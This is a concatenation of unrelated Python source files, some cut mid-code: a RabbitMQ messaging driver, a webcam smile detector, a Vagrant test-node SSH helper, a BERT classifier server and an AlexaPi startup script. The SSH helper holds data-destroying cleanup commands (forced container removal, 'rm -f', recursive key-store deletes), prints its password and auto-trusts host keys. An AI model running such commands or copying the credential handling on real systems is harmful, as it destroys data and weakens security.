if self.channel is not None:
self._declared_queues.clear()
self._declared_exchanges.clear()
self.connection.maybe_close_channel(self.channel)
self.channel = new_channel
if new_channel is not None:
if self.purpose == rpc_common.PURPOSE_LISTEN:
self._set_qos(new_channel)
self._producer = kombu.messaging.Producer(new_channel,
on_return=self.on_return)
for consumer in self._consumers:
consumer.declare(self)
def _set_qos(self, channel):
"""Set QoS prefetch count on the channel"""
if self.rabbit_qos_prefetch_count > 0:
channel.basic_qos(0,
self.rabbit_qos_prefetch_count,
False)
def close(self):
"""Close/release this connection."""
self._heartbeat_stop()
if self.connection:
for consumer in filter(lambda c: c.type == 'fanout',
self._consumers):
LOG.debug('[connection close] Deleting fanout '
'queue: %s ' % consumer.queue.name)
consumer.queue.delete()
self._set_current_channel(None)
self.connection.release()
self.connection = None
def reset(self):
"""Reset a connection so it can be used again."""
with self._connection_lock:
try:
for consumer, tag in self._consumers.items():
consumer.cancel(tag=tag)
except kombu.exceptions.OperationalError:
self.ensure_connection()
self._consumers.clear()
self._active_tags.clear()
self._new_tags.clear()
self._tags = itertools.count(1)
def _heartbeat_supported_and_enabled(self):
if self.heartbeat_timeout_threshold <= 0:
return False
if self.connection.supports_heartbeats:
return True
elif not self._heartbeat_support_log_emitted:
LOG.warning("Heartbeat support requested but it is not "
"supported by the kombu driver or the broker")
self._heartbeat_support_log_emitted = True
return False
def set_transport_socket_timeout(self, timeout=None):
# NOTE(sileht): they are some case where the heartbeat check
# or the producer.send return only when the system socket
# timeout if reach. kombu doesn't allow use to customise this
# timeout so for py-amqp we tweak ourself
# NOTE(dmitryme): Current approach works with amqp==1.4.9 and
# kombu==3.0.33. Once the commit below is released, we should
# try to set the socket timeout in the constructor:
# https://github.com/celery/py-amqp/pull/64
heartbeat_timeout = self.heartbeat_timeout_threshold
if self._heartbeat_supported_and_enabled():
# NOTE(sileht): we are supposed to send heartbeat every
# heartbeat_timeout, no need to wait more otherwise will
# disconnect us, so raise timeout earlier ourself
if timeout is None:
timeout = heartbeat_timeout
else:
timeout = min(heartbeat_timeout, timeout)
try:
sock = self.channel.connection.sock
except AttributeError as e:
# Level is set to debug because otherwise we would spam the logs
LOG.debug('[%s] Failed to get socket attribute: %s'
% (self.connection_id, str(e)))
else:
sock.settimeout(timeout)
# TCP_USER_TIMEOUT is not defined on Windows and Mac OS X
if sys.platform != 'win32' and sys.platform != 'darwin':
try:
timeout = timeout * 1000 if timeout is not None else 0
# NOTE(gdavoian): only integers and strings are allowed
# as socket options' values, and TCP_USER_TIMEOUT option
# can take only integer values, so we round-up the timeout
# to the nearest integer in order to ensure that the
# connection is not broken before the expected timeout
sock.setsockopt(socket.IPPROTO_TCP,
TCP_USER_TIMEOUT,
int(math.ceil(timeout)))
except socket.error as error:
code = error[0]
# TCP_USER_TIMEOUT not defined on kernels <2.6.37
if code != errno.ENOPROTOOPT:
raise
@contextlib.contextmanager
def _transport_socket_timeout(self, timeout):
self.set_transport_socket_timeout(timeout)
yield
self.set_transport_socket_timeout()
def _heartbeat_check(self):
# NOTE(sileht): we are supposed to send at least one heartbeat
# every heartbeat_timeout_threshold, so no need to way more
self.connection.heartbeat_check(rate=self.heartbeat_rate)
def _heartbeat_start(self):
if self._heartbeat_supported_and_enabled():
self._heartbeat_exit_event = threading.Event()
self._heartbeat_thread = threading.Thread(
target=self._heartbeat_thread_job, name="Rabbit-heartbeat")
self._heartbeat_thread.daemon = True
self._heartbeat_thread.start()
else:
self._heartbeat_thread = None
def _heartbeat_stop(self):
if self._heartbeat_thread is not None:
self._heartbeat_exit_event.set()
self._heartbeat_thread.join()
self._heartbeat_thread = None
def _heartbeat_thread_job(self):
"""Thread that maintains inactive connections
"""
while not self._heartbeat_exit_event.is_set():
with self._connection_lock.for_heartbeat():
try:
try:
self._heartbeat_check()
# NOTE(sileht): We need to drain event to receive
# heartbeat from the broker but don't hold the
# connection too much times. In amqpdriver a connection
# is used exclusively for read or for write, so we have
# to do this for connection used for write drain_events
# already do that for other connection
try:
self.connection.drain_events(timeout=0.001)
except socket.timeout:
pass
# NOTE(hberaud): In a clustered rabbitmq when
# a node disappears, we get a ConnectionRefusedError
# because the socket get disconnected.
# The socket access yields a OSError because the heartbeat
# tries to reach an unreachable host (No route to host).
# Catch these exceptions to ensure that we call
# ensure_connection for switching the
# connection destination.
except (socket.timeout,
ConnectionRefusedError,
OSError,
kombu.exceptions.OperationalError,
amqp_exec.ConnectionForced) as exc:
LOG.info("A recoverable connection/channel error "
"occurred, trying to reconnect: %s", exc)
self.ensure_connection()
except Exception:
LOG.warning("Unexpected error during heartbeat "
"thread processing, retrying...")
LOG.debug('Exception', exc_info=True)
self._heartbeat_exit_event.wait(
timeout=self._heartbeat_wait_timeout)
self._heartbeat_exit_event.clear()
def declare_consumer(self, consumer):
"""Create a Consumer using the class that was passed in and
add it to our list of consumers
"""
def _connect_error(exc):
log_info = {'topic': consumer.routing_key, 'err_str': exc}
LOG.error("Failed to declare consumer for topic '%(topic)s': "
"%(err_str)s", log_info)
def _declare_consumer():
consumer.declare(self)
tag = self._active_tags.get(consumer.queue_name)
if tag is None:
tag = next(self._tags)
self._active_tags[consumer.queue_name] = tag
self._new_tags.add(tag)
self._consumers[consumer] = tag
return consumer
with self._connection_lock:
return self.ensure(_declare_consumer,
error_callback=_connect_error)
def consume(self, timeout=None):
"""Consume from all queues/consumers."""
timer = rpc_common.DecayingTimer(duration=timeout)
timer.start()
def _raise_timeout():
raise rpc_common.Timeout()
def _recoverable_error_callback(exc):
if not isinstance(exc, rpc_common.Timeout):
self._new_tags = set(self._consumers.values())
timer.check_return(_raise_timeout)
def _error_callback(exc):
_recoverable_error_callback(exc)
LOG.error('Failed to consume message from queue: %s', exc)
def _consume():
# NOTE(sileht): in case the acknowledgment or requeue of a
# message fail, the kombu transport can be disconnected
# In this case, we must redeclare our consumers, so raise
# a recoverable error to trigger the reconnection code.
if not self.connection.connected:
raise self.connection.recoverable_connection_errors[0]
while self._new_tags:
for consumer, tag in self._consumers.items():
if tag in self._new_tags:
consumer.consume(self, tag=tag)
self._new_tags.remove(tag)
poll_timeout = (self._poll_timeout if timeout is None
else min(timeout, self._poll_timeout))
while True:
if self._consume_loop_stopped:
return
if self._heartbeat_supported_and_enabled():
self._heartbeat_check()
try:
self.connection.drain_events(timeout=poll_timeout)
return
except socket.timeout:
poll_timeout = timer.check_return(
_raise_timeout, maximum=self._poll_timeout)
except self.connection.channel_errors as exc:
if exc.code == 406 and exc.method_name == 'Basic.ack':
# NOTE(gordc): occasionally multiple workers will grab
# same message and acknowledge it. if it happens, meh.
raise self.connection.recoverable_channel_errors[0]
raise
with self._connection_lock:
self.ensure(_consume,
recoverable_error_callback=_recoverable_error_callback,
error_callback=_error_callback)
def stop_consuming(self):
self._consume_loop_stopped = True
def declare_direct_consumer(self, topic, callback):
"""Create a 'direct' queue.
In nova's use, this is generally a msg_id queue used for
responses for call/multicall
"""
consumer = Consumer(
exchange_name='', # using default exchange
queue_name=topic,
routing_key='',
type='direct',
durable=False,
exchange_auto_delete=False,
queue_auto_delete=False,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
rabbit_queue_ttl=self.rabbit_transient_queues_ttl,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def declare_topic_consumer(self, exchange_name, topic, callback=None,
queue_name=None):
"""Create a 'topic' consumer."""
consumer = Consumer(
exchange_name=exchange_name,
queue_name=queue_name or topic,
routing_key=topic,
type='topic',
durable=self.amqp_durable_queues,
exchange_auto_delete=self.amqp_auto_delete,
queue_auto_delete=self.amqp_auto_delete,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def declare_fanout_consumer(self, topic, callback):
"""Create a 'fanout' consumer."""
unique = uuid.uuid4().hex
exchange_name = '%s_fanout' % topic
queue_name = '%s_fanout_%s' % (topic, unique)
consumer = Consumer(
exchange_name=exchange_name,
queue_name=queue_name,
routing_key=topic,
type='fanout',
durable=False,
exchange_auto_delete=True,
queue_auto_delete=False,
callback=callback,
rabbit_ha_queues=self.rabbit_ha_queues,
rabbit_queue_ttl=self.rabbit_transient_queues_ttl,
enable_cancel_on_failover=self.enable_cancel_on_failover)
self.declare_consumer(consumer)
def _ensure_publishing(self, method, exchange, msg, routing_key=None,
timeout=None, retry=None, transport_options=None):
"""Send to a publisher based on the publisher class."""
def _error_callback(exc):
log_info = {'topic': exchange.name, 'err_str': exc}
LOG.error("Failed to publish message to topic "
"'%(topic)s': %(err_str)s", log_info)
LOG.debug('Exception', exc_info=exc)
method = functools.partial(method, exchange, msg, routing_key,
timeout, transport_options)
with self._connection_lock:
self.ensure(method, retry=retry, error_callback=_error_callback)
def _get_connection_info(self, conn_error=False):
# Bug #1745166: set 'conn_error' true if this is being called when the
# connection is in a known error state. Otherwise attempting to access
# the connection's socket while it is in an error state will cause
# py-amqp to attempt reconnecting.
ci = self.connection.info()
info = dict([(k, ci.get(k)) for k in
['hostname', 'port', 'transport']])
client_port = None
if (not conn_error and self.channel and
hasattr(self.channel.connection, 'sock') and
self.channel.connection.sock):
client_port = self.channel.connection.sock.getsockname()[1]
info.update({'client_port': client_port,
'connection_id': self.connection_id})
return info
def _publish(self, exchange, msg, routing_key=None, timeout=None,
transport_options=None):
"""Publish a message."""
if not (exchange.passive or exchange.name in self._declared_exchanges):
exchange(self.channel).declare()
self._declared_exchanges.add(exchange.name)
log_info = {'msg': msg,
'who': exchange or 'default',
'key': routing_key,
'transport_options': str(transport_options)}
LOG.trace('Connection._publish: sending message %(msg)s to'
' %(who)s with routing key %(key)s', log_info)
# NOTE(sileht): no need to wait more, caller expects
# a answer before timeout is reached
with self._transport_socket_timeout(timeout):
self._producer.publish(
msg,
mandatory=transport_options.at_least_once if
transport_options else False,
exchange=exchange,
routing_key=routing_key,
expiration=timeout,
compression=self.kombu_compression)
def _publish_and_creates_default_queue(self, exchange, msg,
routing_key=None, timeout=None,
transport_options=None):
"""Publisher that declares a default queue
When the exchange is missing instead of silently creates an exchange
not binded to a queue, this publisher creates a default queue
named with the routing_key
This is mainly used to not miss notification in case of nobody consumes
them yet. If the future consumer bind the default queue it can retrieve
missing messages.
_set_current_channel is responsible to cleanup the cache.
"""
queue_identifier = (exchange.name, routing_key)
# NOTE(sileht): We only do it once per reconnection
# the Connection._set_current_channel() is responsible to clear
# this cache
if queue_identifier not in self._declared_queues:
queue = kombu.entity.Queue(
channel=self.channel,
exchange=exchange,
durable=exchange.durable,
auto_delete=exchange.auto_delete,
name=routing_key,
routing_key=routing_key,
queue_arguments=_get_queue_arguments(self.rabbit_ha_queues, 0))
log_info = {'key': routing_key, 'exchange': exchange}
LOG.trace(
'Connection._publish_and_creates_default_queue: '
'declare queue %(key)s on %(exchange)s exchange', log_info)
queue.declare()
self._declared_queues.add(queue_identifier)
self._publish(exchange, msg, routing_key=routing_key, timeout=timeout)
def _publish_and_raises_on_missing_exchange(self, exchange, msg,
routing_key=None,
timeout=None,
transport_options=None):
"""Publisher that raises exception if exchange is missing."""
if not exchange.passive:
raise RuntimeError("_publish_and_retry_on_missing_exchange() must "
"be called with an passive exchange.")
try:
self._publish(exchange, msg, routing_key=routing_key,
timeout=timeout, transport_options=transport_options)
return
except self.connection.channel_errors as exc:
if exc.code == 404:
# NOTE(noelbk/sileht):
# If rabbit dies, the consumer can be disconnected before the
# publisher sends, and if the consumer hasn't declared the
# queue, the publisher's will send a message to an exchange
# that's not bound to a queue, and the message wll be lost.
# So we set passive=True to the publisher exchange and catch
# the 404 kombu ChannelError and retry until the exchange
# appears
raise rpc_amqp.AMQPDestinationNotFound(
"exchange %s doesn't exist" % exchange.name)
raise
def direct_send(self, msg_id, msg):
"""Send a 'direct' message."""
exchange = kombu.entity.Exchange(name='', # using default exchange
type='direct',
durable=False,
auto_delete=True,
passive=True)
options = oslo_messaging.TransportOptions(
at_least_once=self.direct_mandatory_flag)
self._ensure_publishing(self._publish_and_raises_on_missing_exchange,
exchange, msg, routing_key=msg_id,
transport_options=options)
def topic_send(self, exchange_name, topic, msg, timeout=None, retry=None,
transport_options=None):
"""Send a 'topic' message."""
exchange = kombu.entity.Exchange(
name=exchange_name,
type='topic',
durable=self.amqp_durable_queues,
auto_delete=self.amqp_auto_delete)
self._ensure_publishing(self._publish, exchange, msg,
routing_key=topic, timeout=timeout,
retry=retry,
transport_options=transport_options)
def fanout_send(self, topic, msg, retry=None):
"""Send a 'fanout' message."""
exchange = kombu.entity.Exchange(name='%s_fanout' % topic,
type='fanout',
durable=False,
auto_delete=True)
self._ensure_publishing(self._publish, exchange, msg, retry=retry)
def notify_send(self, exchange_name, topic, msg, retry=None, **kwargs):
"""Send a notify message on a topic."""
exchange = kombu.entity.Exchange(
name=exchange_name,
type='topic',
durable=self.amqp_durable_queues,
auto_delete=self.amqp_auto_delete)
self._ensure_publishing(self._publish_and_creates_default_queue,
exchange, msg, routing_key=topic, retry=retry)
class RabbitDriver(amqpdriver.AMQPDriverBase):
"""RabbitMQ Driver
The ``rabbit`` driver is the default driver used in OpenStack's
integration tests.
The driver is aliased as ``kombu`` to support upgrading existing
installations with older settings.
"""
def __init__(self, conf, url,
default_exchange=None,
allowed_remote_exmods=None):
opt_group = cfg.OptGroup(name='oslo_messaging_rabbit',
title='RabbitMQ driver options')
conf.register_group(opt_group)
conf.register_opts(rabbit_opts, group=opt_group)
conf.register_opts(rpc_amqp.amqp_opts, group=opt_group)
conf.register_opts(base.base_opts, group=opt_group)
conf = rpc_common.ConfigOptsProxy(conf, url, opt_group.name)
self.missing_destination_retry_timeout = (
conf.oslo_messaging_rabbit.kombu_missing_consumer_retry_timeout)
self.prefetch_size = (
conf.oslo_messaging_rabbit.rabbit_qos_prefetch_count)
# the pool configuration properties
max_size = conf.oslo_messaging_rabbit.rpc_conn_pool_size
min_size = conf.oslo_messaging_rabbit.conn_pool_min_size
if max_size < min_size:
raise RuntimeError(
f"rpc_conn_pool_size: {max_size} must be greater than "
f"or equal to conn_pool_min_size: {min_size}")
ttl = conf.oslo_messaging_rabbit.conn_pool_ttl
connection_pool = pool.ConnectionPool(
conf, max_size, min_size, ttl,
url, Connection)
super(RabbitDriver, self).__init__(
conf, url,
connection_pool,
default_exchange,
allowed_remote_exmods
)
def require_features(self, requeue=True):
pass
|
run.py
|
import cv2
import threading
import sys
from PyQt5 import QtWidgets
from PyQt5 import QtGui
from PyQt5 import QtCore
import visualize
running = False
def run():
global running
cap = cv2.VideoCapture(0)
width = cap.get(cv2.CAP_PROP_FRAME_WIDTH)
height = cap.get(cv2.CAP_PROP_FRAME_HEIGHT)
label.resize(width, height)
counter=0
while running:
counter += 1
ret, img = cap.read()
if ret:
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
if counter % 10 == 0:
mood, emoji_img = visualize.img2mood(img)
if mood != 3:
text = 'Come on. Smile!'
loc_x = 195
loc_y = 120
else:
text = 'Your smile is beautiful!'
loc_x = 135
loc_y = 120
emoji_img = cv2.cvtColor(emoji_img, cv2.COLOR_BGR2RGB)
emoji_img = cv2.cvtColor(emoji_img, cv2.COLOR_BGR2RGB)
cv2.putText(emoji_img, text, (loc_x, loc_y), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 0), thickness=2)
h,w,c = emoji_img.shape
qImg = QtGui.QImage(emoji_img.data, w, h, w*c, QtGui.QImage.Format_RGB888)
pixmap = QtGui.QPixmap.fromImage(qImg)
label.setPixmap(pixmap)
else:
QtWidgets.QMessageBox.about(win, "Error", "Cannot read frame.")
print("cannot read frame.")
break
cap.release()
print("Thread end.")
def stop():
global running
running = False
print("stoped..")
def start():
global running
running = True
th = threading.Thread(target=run)
th.start()
print("started..")
def onExit():
print("exit")
stop()
app = QtWidgets.QApplication([])
win = QtWidgets.QWidget()
vbox = QtWidgets.QVBoxLayout()
label = QtWidgets.QLabel()
btn_start = QtWidgets.QPushButton("Camera On")
btn_stop = QtWidgets.QPushButton("Camera Off")
vbox.addWidget(label)
vbox.addWidget(btn_start)
vbox.addWidget(btn_stop)
win.setLayout(vbox)
win.show()
btn_start.clicked.connect(start)
btn_stop.clicked.connect(stop)
app.aboutToQuit.connect(onExit)
sys.exit(app.exec_())
|
tnode.py
|
import paramiko
import threading
import sys
import os
import time
import container
import tutils
import exceptions
# Utility function to run ssh
def ssh_exec_thread(ssh_object, command):
print "run: " + command
stdin, stdout, stderr = ssh_object.exec_command(command)
out = stdout.readlines()
print out
print "Program exited: " + command
exitCode = stdout.channel.recv_exit_status()
if exitCode != 0:
print "Exit code: " + str(exitCode)
# This class represents a vagrant node
class Node:
def __init__(self, addr, username='vagrant', password='vagrant', binpath='/opt/gopath/bin'):
self.addr = addr
self.username = username
self.password = password
self.binpath = binpath
self.ssh = self.sshConnect(username, password)
out, err, ec = self.runCmd("hostname")
self.hostname = out[0].split('\n')[0]
print "Connected to " + self.hostname
# Connect to vagrant node
def sshConnect(self, username, password):
ssh_object = paramiko.SSHClient()
ssh_object.set_missing_host_key_policy( paramiko.AutoAddPolicy() )
print "Connecting to " + self.addr + " with userid: " + username + " password: " + password
try:
ssh_object.connect(self.addr, username=username, password=password)
return ssh_object
except paramiko.ssh_exception.AuthenticationException:
tutils.exit("Authentication failed")
def isConnected(self):
transport = self.ssh.get_transport() if self.ssh else None
return transport and transport.is_active()
# Run a command on vagrant node
def runCmd(self, cmd, timeout=None):
try:
print "run: " + cmd
# We we disconnected for any reason, reconnect
if not self.isConnected():
self.ssh = self.sshConnect(self.username, self.password)
# Execute the command
stdin, stdout, stderr = self.ssh.exec_command(cmd, timeout=timeout)
out = stdout.readlines()
err = stderr.readlines()
exitCode = stdout.channel.recv_exit_status()
if out != [] or exitCode != 0:
print "stdout(" + str(exitCode) + "):" + ''.join(out)
if err != []:
print "stderr: " + ''.join(err)
return out, err, exitCode
except exceptions.EOFError:
print "Ignoring EOF errors executing command"
return [], [], 0
# Start netplugin process on vagrant node
def startNetplugin(self, args=""):
ssh_object = self.sshConnect(self.username, self.password)
command = "sudo " + self.binpath + "/netplugin -plugin-mode docker -vlan-if eth2 -cluster-store " + os.environ["CONTIV_CLUSTER_STORE"] + " " + args + "> /tmp/netplugin.log 2>&1"
self.npThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
# npThread.setDaemon(True)
self.npThread.start()
# Start netmaster process
def startNetmaster(self):
ssh_object = self.sshConnect(self.username, self.password)
command = "GOPATH=/opt/gopath " + self.binpath + "/netmaster -cluster-store " + os.environ["CONTIV_CLUSTER_STORE"] + " > /tmp/netmaster.log 2>&1"
self.nmThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
# npThread.setDaemon(True)
self.nmThread.start()
# Start Swarm Containers
def utilSwarmContainer(self, command):
ssh_object = self.sshConnect(self.username, self.password)
self.swThread = threading.Thread(target=ssh_exec_thread, args=(ssh_object, command))
self.swThread.start()
# Stop netplugin by killing it
def stopNetplugin(self):
self.runCmd("sudo pkill netplugin")
# Stop netmaster by killing it
def stopNetmaster(self):
self.runCmd("sudo pkill netmaster")
def cleanupDockerNetwork(self):
# cleanup docker network
out, err, exitCode = self.runCmd("docker network ls | grep -w netplugin | awk '{print $2}'")
for net in out:
self.runCmd("docker network rm " + net)
# Remove all containers on this node
def cleanupContainers(self):
self.runCmd("docker ps -a | grep -v swarm | awk '{print $1}' | xargs -r docker rm -fv ")
# Cleanup all state created by netplugin
def cleanupSlave(self):
self.runCmd("docker ps -a | grep alpine | awk '{print $1}' | xargs -r docker rm -fv ")
self.runCmd("sudo ovs-vsctl del-br contivVxlanBridge")
self.runCmd("sudo ovs-vsctl del-br contivVlanBridge")
self.runCmd("ifconfig | grep -e vport | awk '{print $1}' | xargs -r -n1 -I{} sudo ip link delete {} type veth")
self.runCmd("sudo rm -f /var/run/docker/plugins/netplugin.sock")
self.runCmd("sudo rm -f /tmp/net*")
# Cleanup all state created by netmaster
def cleanupMaster(self):
self.runCmd("etcdctl ls /contiv > /dev/null 2>&1 && etcdctl rm --recursive /contiv")
self.runCmd("etcdctl ls /contiv.io > /dev/null 2>&1 && etcdctl rm --recursive /contiv.io")
self.runCmd("etcdctl ls /docker > /dev/null 2>&1 && etcdctl rm --recursive /docker")
self.runCmd("etcdctl ls /skydns > /dev/null 2>&1 && etcdctl rm --recursive /skydns")
self.runCmd("curl -X DELETE localhost:8500/v1/kv/contiv.io?recurse=true")
self.runCmd("curl -X DELETE localhost:8500/v1/kv/docker?recurse=true")
# Run container on a node
def runContainer(self, imgName="ubuntu:14.04", cmdName="sh", networkName=None, serviceName=None, cntName=""):
netSrt = ""
if networkName != None:
netSrt = "--net=" + networkName
if serviceName != None:
netSrt = "--net=" + serviceName + "." + networkName
cntStr = ""
if cntName != "":
cntStr = "--name=" + cntName
# docker command
dkrCmd = "docker run -itd " + netSrt + " " + cntStr + " " + imgName + " " + cmdName
out, err, exitCode = self.runCmd(dkrCmd)
if exitCode != 0:
print "Error running container: " + dkrCmd + " on " + self.addr
print "Exit status: " + str(exitCode) + "\nError:"
print err
exit("docker run failed")
# Container id is in the first line
cid = out[0].split('\n')[0]
# Return a container object
return container.Container(self, cid, cntName="")
def checkForNetpluginErrors(self):
out, err, exitCode = self.runCmd('grep "error\|fatal" /tmp/net*')
if out != [] or err != []:
print "\n\n\n\n\n\n"
tutils.log("Error:\n" + ''.join(out) + ''.join(err))
tutils.log("Errors seen in log files on: " + self.hostname)
return False
return True
|
porn_prediction.py
|
import sys,os
sys.path.append("..")
import numpy as np
import tensorflow as tf
from example import bert_classifier_estimator
from bunch import Bunch
from data_generator import tokenization
from data_generator import tf_data_utils
from model_io import model_io
from example import feature_writer, write_to_tfrecords, classifier_processor
import json
from data_generator import tokenization
import os
os.environ["CUDA_VISIBLE_DEVICES"] = ""
def full2half(s):
n = []
for char in s:
num = ord(char)
if num == 0x3000:
num = 32
elif 0xFF01 <= num <= 0xFF5E:
num -= 0xfee0
num = chr(num)
n.append(num)
return ''.join(n)
from queue import Queue
class InferAPI(object):
def __init__(self, config):
self.config = config
self.input_queue = Queue(maxsize=1)
self.output_queue = Queue(maxsize=1)
def load_label_dict(self):
with open(self.config["label2id"], "r") as frobj:
self.label_dict = json.load(frobj)
def init_model(self):
self.graph = tf.Graph()
with self.graph.as_default():
init_checkpoint = self.config["init_checkpoint"]
bert_config = json.load(open(self.config["bert_config"], "r"))
self.model_config = Bunch(bert_config)
self.model_config.use_one_hot_embeddings = True
self.model_config.scope = "bert"
self.model_config.dropout_prob = 0.1
self.model_config.label_type = "single_label"
opt_config = Bunch({"init_lr":2e-5, "num_train_steps":1e30, "cycle":False})
model_io_config = Bunch({"fix_lm":False})
self.num_classes = len(self.label_dict["id2label"])
self.max_seq_length = self.config["max_length"]
self.tokenizer = tokenization.FullTokenizer(
vocab_file=self.config["bert_vocab"],
do_lower_case=True)
self.sess = tf.Session()
self.model_io_fn = model_io.ModelIO(model_io_config)
model_fn = bert_classifier_estimator.classifier_model_fn_builder(
self.model_config,
self.num_classes,
init_checkpoint,
reuse=None,
load_pretrained=True,
model_io_fn=self.model_io_fn,
model_io_config=model_io_config,
opt_config=opt_config)
self.estimator = tf.estimator.Estimator(
model_fn=model_fn,
model_dir=self.config["model_dir"])
def get_input_features(self, sent_lst):
input_ids_lst, input_mask_lst, segment_ids_lst = [], [], []
label_ids_lst = []
for sent in sent_lst:
sent = full2half(sent)
tokens_a = self.tokenizer.tokenize(sent)
if len(tokens_a) > self.max_seq_length - 2:
tokens_a = tokens_a[0:(self.max_seq_length - 2)]
tokens = []
segment_ids = []
tokens.append("[CLS]")
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append("[SEP]")
segment_ids.append(0)
input_ids = self.tokenizer.convert_tokens_to_ids(tokens)
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < self.max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
label_ids = 0
input_ids_lst.append(input_ids)
input_mask_lst.append(input_mask)
segment_ids_lst.append(segment_ids)
label_ids_lst.append(label_ids)
return {"input_ids":np.array(input_ids_lst).astype(np.int32),
"input_mask":np.array(input_mask_lst).astype(np.int32),
"segment_ids":np.array(segment_ids_lst).astype(np.int32),
"label_ids":np.array(label_ids_lst).astype(np.int32)}
def input_fn(self, input_features):
dataset = tf.data.Dataset.from_tensor_slices(input_features)
dataset = dataset.batch(self.config.get("batch_size", 20))
# iterator = dataset.make_one_shot_iterator()
# features = iterator.get_next()
return dataset
def generate_from_queue(self):
""" Generator which yields items from the input queue.
This lives within our 'prediction thread'.
"""
while True:
yield self.input_queue.get()
def predict_from_queue(self):
""" Adds a prediction from the model to the output_queue.
This lives within our 'prediction thread'.
Note: estimators accept generators as inputs and return generators as output.
Here, we are iterating through the output generator, which will be
populated in lock-step with the input generator.
"""
# features = self.get_input_features(["据此,订约方同意终止认购协议,而公司及认购方概无责任根据认购协议分別发行及认购股可换股债券。"]*2)
for i in self.estimator.predict(input_fn=self.queued_predict_input_fn,
checkpoint_path=self.config["init_checkpoint"]):
# if self.verbose:
# print('Putting in output queue')
print(i)
print('Putting in output queue')
print("===========")
self.output_queue.put(i)
def queued_predict_input_fn(self):
"""
Queued version of the `predict_input_fn` in FlowerClassifier.
Instead of yielding a dataset from data as a parameter,
we construct a Dataset from a generator,
which yields from the input queue.
"""
# Fetch the inputs from the input queue
output_types = {'input_ids': tf.int32,
'input_mask': tf.int32,
'segment_ids': tf.int32,
'label_ids': tf.int32}
output_shapes = {'input_ids': [None, self.max_seq_length ],
'input_mask': [None, self.max_seq_length ],
'segment_ids': [None, self.max_seq_length ],
'label_ids': [1,]}
dataset = tf.data.Dataset.from_generator(self.generate_from_queue, output_types=output_types, output_shapes=output_shapes)
#dataset = dataset.batch(self.config.get("batch_size", 20))
return dataset
def predict(self, sent_lst):
# Get predictions dictionary
features = dict(self.get_input_features(sent_lst))
print("call api", self.input_queue.qsize())
print("call api", self.output_queue.qsize())
self.input_queue.put(features)
print("call api", self.input_queue.qsize())
predictions = self.output_queue.get() # The latest predictions generator
print("输出结果后", self.output_queue.qsize())
return predictions
def predict_single(self, sent_lst):
# Get predictions dictionary
features = dict(self.get_input_features(sent_lst))
# print("call api", self.input_queue.qsize())
# print("call api", self.output_queue.qsize())
self.input_queue.put(features)
# print("call api", self.input_queue.qsize())
predictions = self.output_queue.get() # The latest predictions generator
# print("输出结果后", self.output_queue.qsize())
predictions["label"] = self.label_dict["id2label"][str(predictions["pred_label"])]
# if predictions["label"] == 'other':
# predictions["label"] = '股票定增'
# predictions["max_prob"] = 0.0
return predictions
def predict_batch(self, sen_lst):
return [self.predict_single([sent]) for sent in sen_lst]
def infer(self, sent_lst):
with self.graph.as_default():
for result in self.estimator.predict(input_fn=lambda: self.input_fn(input_features),
checkpoint_path=self.config["init_checkpoint"]):
print(result)
os.environ["CUDA_VISIBLE_DEVICES"] = ""
model_config = {
"label2id":"/data/xuht/websiteanalyze-data-seqing20180821/label_dict.json",
"init_checkpoint":"/data/xuht/websiteanalyze-data-seqing20180821/model/oqmrc_8.ckpt",
"bert_config":"/data/xuht/chinese_L-12_H-768_A-12/bert_config.json",
"max_length":128,
"bert_vocab":"/data/xuht/chinese_L-12_H-768_A-12/vocab.txt",
"model_dir":"/data/xuht/websiteanalyze-data-seqing20180821/model"
}
api = InferAPI(model_config)
api.load_label_dict()
api.init_model()
from threading import Thread
t = Thread(target=api.predict_from_queue, daemon=True)
t.start()
# while True:
# import time
# try:
# result = api.predict_batch(["据此,订约方同意终止认购协议,而公司及认购方概无责任根据认购协议分別发行及认购股可换股债券。"]*8)
# except:
# raise
# time.sleep(1)
import tornado.ioloop
import tornado.web
import tornado.httpserver
import json
class PredictHandler(tornado.web.RequestHandler):
def post(self):
body = json.loads(self.request.body.decode(), encoding="utf-8")
sentences = body.get("sentences")
result = api.predict_batch(sentences)
output = []
for row in result:
item = {}
item["label"] = str(row["label"])
item["max_prob"] = float(row["max_prob"])
output.append(item)
# result = [[[row['label']] for row in result], [[float(row['max_prob'])] for row in result]]
# print(result)
return self.write(json.dumps({"code":200, "data":output}, ensure_ascii=False))
def main():
application = tornado.web.Application([(r"/lxm",PredictHandler),])
http_server = tornado.httpserver.HTTPServer(application)
http_server.bind(8891)
http_server.start()
print("-------------server start-----------------")
tornado.ioloop.IOLoop.current().start()
if __name__ == "__main__":
main()
|
main.py
|
#! /usr/bin/env python
import importlib
import os
import logging
import tempfile
import signal
import shutil
import time
import sys
import threading
import json
import optparse
import email
import subprocess
import hashlib
import yaml
import requests
import coloredlogs
import alexapi.config
import alexapi.tunein as tunein
import alexapi.capture
import alexapi.triggers as triggers
from alexapi.exceptions import ConfigurationException
from alexapi.constants import RequestType, PlayerActivity
logging.basicConfig(format='%(asctime)s %(levelname)s: %(message)s')
coloredlogs.DEFAULT_FIELD_STYLES = {
'hostname': {'color': 'magenta'},
'programname': {'color': 'cyan'},
'name': {'color': 'blue'},
'levelname': {'color': 'magenta', 'bold': True},
'asctime': {'color': 'green'}
}
coloredlogs.DEFAULT_LEVEL_STYLES = {
'info': {'color': 'blue'},
'critical': {'color': 'red', 'bold': True},
'error': {'color': 'red'},
'debug': {'color': 'green'},
'warning': {'color': 'yellow'}
}
# Get arguments
parser = optparse.OptionParser()
parser.add_option('-s', '--silent',
dest="silent",
action="store_true",
default=False,
help="start without saying hello")
parser.add_option('-d', '--debug',
dest="debug",
action="store_true",
default=False,
help="display debug messages")
parser.add_option('--daemon',
dest="daemon",
action="store_true",
default=False,
help="Used by initd/systemd start script to reconfigure logging")
cmdopts, cmdargs = parser.parse_args()
silent = cmdopts.silent
debug = cmdopts.debug
